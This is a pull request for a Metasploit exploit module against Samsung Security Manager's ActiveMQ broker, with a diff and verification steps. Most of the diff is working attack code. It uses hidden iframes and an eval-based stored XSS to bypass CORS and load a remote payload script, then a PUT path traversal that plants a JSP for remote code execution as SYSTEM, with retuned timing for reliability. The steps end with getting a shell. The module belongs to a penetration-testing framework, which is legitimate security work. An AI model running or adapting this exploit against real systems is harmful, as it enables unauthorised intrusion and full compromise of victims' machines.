### PR TITLE
Update samsung_security_manager_put for better reliability

### DIFF
--- a/modules/exploits/windows/browser/samsung_security_manager_put.rb
+++ b/modules/exploits/windows/browser/samsung_security_manager_put.rb
@@ -14,28 +14,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Samsung Security Manager 1.5 ActiveMQ Broker Service PUT Method Remote Code Execution",
+      'Name'           => "Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution",
       'Description'    => %q{
-        This is an exploit against Samsung Security Manager that bypasses the patch in
-        CVE-2015-3435 by exploiting the vulnerability against the client side. This exploit has
-        been tested successfully against IE, FireFox and Chrome by abusing a GET request XSS to
-        bypass CORS and reach the vulnerable PUT. Finally, a traversal is used in the PUT request
-        to upload the code just where we want it and gain Remote Code Execution as SYSTEM.
+        This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481
+        by exploiting the vulnerability against the client-side. This exploit has been tested successfully using
+        IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. Finally
+        a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'mr_me <mr_me[at]offensive-security.com>', # vuln + module
+          'mr_me <mr_me[at]offensive-security.com>',                            # AWAE training 2016
         ],
       'References'     =>
         [
-          [ 'URL', 'http://metasploit.com' ]
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-15-156/' ], # client vs server
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-16-481/' ]  # client vs server
         ],
       'Platform'       => 'win',
       'Targets'        =>
         [
-          # tested on 1.32, 1.4 & 1.5
-          [ 'Samsung Security Manager 1.32, 1.4 & 1.5 Universal', {} ],
+          [ 'Samsung Security Manager 1.32 & 1.4 Universal', {} ]               # tested on 1.32 & 1.4
         ],
       'DisclosureDate' => "Aug 05 2016",
       'DefaultTarget'  => 0))
@@ -175,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       function start() {
         do_put('#{jsp_uri}', String.fromCharCode(#{encoded_jsp}));
-        setTimeout(exploit(), 2000); // timing is important
+        setTimeout(exploit(), 4000); // timing is important
       }
       start();
       |
@@ -198,27 +197,39 @@ class MetasploitModule < Msf::Exploit::Remote
        onlick.obfuscate
     end
 
-    iframe_injection = ""
-    # done so that we can ensure that we hit our payload, since iframes load very fast, we need a few
-    (1..20).step(1) do |n|
-      iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"
-    end
-
-    # the stored XSS endpoint
-    target  = "http://localhost:8161/admin/browse.jsp?JMSDestination="
-
-    # we use XSS to execute JavaScript code in local context to avoid CORS
-    xss_injection =  "\"+eval(\"var a=document.createElement('script');a.type='text/javascript';"
-    xss_injection << "a.src='#{payload_url}';document.body.appendChild(a)\")+\""
-    target << Rex::Text.uri_encode(xss_injection)
-
     # we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
     # and the response is recieved in the page (even though we cant access it due to SOP) which then fires the XSS
     html_content = %Q|
     <html>
     <body>
-    <iframe src="#{target}" width="0" height="0"></iframe>
-    #{iframe_injection}
+    <script>
+
+    function fire() {
+      var a = document.createElement('script');
+      a.type = 'text/javascript';
+      a.src = '#{payload_url}';
+      document.body.appendChild(a);
+    };
+
+    var code = fire.toString() + ";fire();";
+    var evalCode = 'eval("' + code + '")';
+    var if1 = document.createElement("iframe");
+    if1.src = 'http://localhost:8161/admin/browse.jsp?JMSDestination="%2b' + evalCode + '%2b"';
+    if1.width = 0;
+    if1.height = 0;
+    document.body.appendChild(if1);
+
+    </script>
+    <script>
+
+    window.onload = function() {
+      var if2 = document.createElement("iframe");
+      if2.src = "http://localhost:8161/admin/queueGraph.jsp"
+      if2.width = 0;
+      if2.height = 0;
+      document.body.appendChild(if2);
+    };
+    </script>
     </body>
     </html>
     |
@@ -227,4 +238,3 @@ class MetasploitModule < Msf::Exploit::Remote
     handler(cli)
   end
 end
-


### PR DESCRIPTION
This patch allows the samsung_security_manager_put module to:
1. Stage 1 XSS/JS attack to use the body.onload callback
2. Better timing for FF

This was submitted by mr_me
## Verification
- [x] Install Samsung Security Manager 1.4
- [x] Start msfconsole
- [x] Do: `exploit/windows/browser/samsung_security_manager_put`
- [x] Do: `run`
- [x] Visit the malicious link
- [x] You should get a shell
